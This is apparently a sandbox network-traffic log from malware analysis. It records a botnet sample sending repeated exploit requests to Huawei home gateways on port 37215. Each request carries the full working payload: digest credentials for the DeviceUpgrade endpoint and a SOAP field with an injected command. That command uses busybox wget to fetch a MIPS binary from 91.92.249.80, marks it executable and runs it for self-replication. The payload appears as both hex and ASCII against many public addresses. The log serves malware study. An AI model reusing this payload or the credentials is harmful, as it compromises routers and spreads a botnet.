                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1444192.168.2.235702041.170.54.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473381042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1445192.168.2.235915241.203.7.18337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473556042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1446192.168.2.2350300181.83.44.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473557949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1447192.168.2.235850441.202.33.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473579884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1448192.168.2.2359414197.171.212.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473583937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1449192.168.2.2345742170.115.97.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473583937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1450192.168.2.236081641.112.136.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473598957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1451192.168.2.2342358202.45.105.18337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473598957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1452192.168.2.2350982115.10.147.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473613977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1453192.168.2.234878241.205.19.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473623991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1454192.168.2.235195841.121.98.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.473711967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
